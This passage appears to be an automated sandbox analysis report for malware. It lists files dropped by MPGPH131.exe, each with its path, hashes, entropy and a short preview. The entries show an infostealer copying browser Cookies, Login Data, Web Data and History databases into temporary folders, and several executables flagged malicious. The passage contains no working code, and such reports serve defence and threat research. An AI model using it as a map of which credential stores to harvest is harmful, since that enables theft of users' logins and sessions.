                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\oOPEmFmu_xsJCookies

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):0.8508558324143882
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\pSE1jchbiT9aHistory

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\suOrwW4ZcUbjWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\yk50FvD1XOCg2Y2iAkjB.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1166336
                                                                                                                                                                                  Entropy (8bit):7.03555490248727
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8aSe2+b+HdiJUC:NTvC/MTQYxsWR7aSe2+b+HoJU
                                                                                                                                                                                  MD5:BA8A470327E60DD9B1CC33B37B5FA8B7
                                                                                                                                                                                  SHA1:2B540D9587B66C173834093045604CF42AEFDCD6
                                                                                                                                                                                  SHA-256:7080E78161D06FED8CD87E3CF5F3B087C15F5E07561FC413F65D86FE73529A46
                                                                                                                                                                                  SHA-512:F9BC2346917751B2AED22E4B9810539513431FC5B70A2BAB0054C2C6831C9C8EF8B06453749E57E6F52BF66C083C457F39231E3B57BB6BA93B7096DBD44E4FA0
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......e..........".................w.............@..........................0.......*....@...@.......@.....................d...|....@..xa.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...xa...@...b..................@..@.reloc...u.......v...V..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\02zdBXl47cvzHistory

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\02zdBXl47cvzcookies.sqlite

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\2jQJv37iJ0lzCookies

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\3b6N2Xdh3CYwWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\3b6N2Xdh3CYwplaces.sqlite

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\8ghN89CsjOW1Login Data For Account

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\D87fZN3R3jFeWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\D87fZN3R3jFeplaces.sqlite

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\Ei8DrAmaYu9KLogin Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\HgvXSle13lm2R30FoCuW.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1166336
                                                                                                                                                                                  Entropy (8bit):7.03555490248727
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8aSe2+b+HdiJUC:NTvC/MTQYxsWR7aSe2+b+HoJU
                                                                                                                                                                                  MD5:BA8A470327E60DD9B1CC33B37B5FA8B7
                                                                                                                                                                                  SHA1:2B540D9587B66C173834093045604CF42AEFDCD6
                                                                                                                                                                                  SHA-256:7080E78161D06FED8CD87E3CF5F3B087C15F5E07561FC413F65D86FE73529A46
                                                                                                                                                                                  SHA-512:F9BC2346917751B2AED22E4B9810539513431FC5B70A2BAB0054C2C6831C9C8EF8B06453749E57E6F52BF66C083C457F39231E3B57BB6BA93B7096DBD44E4FA0
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......e..........".................w.............@..........................0.......*....@...@.......@.....................d...|....@..xa.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...xa...@...b..................@..@.reloc...u.......v...V..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\IK6nP7Vsyy6xQfngv8hq.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2399744
                                                                                                                                                                                  Entropy (8bit):7.962349167063599
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:nBeLY5wqsk2vUnzPT7uc1eb0MmZEazB2XP3Oxc1tHTf:wIt0vcrT7ucAvm90fG
                                                                                                                                                                                  MD5:0EC84D886E773CBA442A61606DF14F06
                                                                                                                                                                                  SHA1:404EFBEAE6B921DCFC1FBE5B90EE47E5FB7B8038
                                                                                                                                                                                  SHA-256:B29798AA1B8E46207A37CCD73613B87BC8F2A6D50774D0079CF7AB341B1EBB3D
                                                                                                                                                                                  SHA-512:5C026CDC1752F026D37AF3619E78565EDC8896DA35D65B373042D200A7C95003518B01D825B5101CD013F7F142505B5F1328D177202C3F76489C1BF787238A52
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..........PE..L......e...............".....V........\...........@...........................\.....}.$...@.................................W...k....`...C.......................................................................................................... . .P..........................@....rsrc....C...`......................@....idata ............................@... ..-.........................@...gakjennq.p...@A..j..................@...brsozmps......\......x$.............@....taggant.0....\.."...|$.............@...................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\IWPfiAXUTJTSHistory

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\KvHrxJ77cmUgLogin Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                  Entropy (8bit):0.8745947603342119
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\QdX9ITDLyCRBWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\UPG2LoPXwc7OWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\UP_uKSEYzgg0BHrTE9Qz.exe

                                                                                                                                                                                  Download File
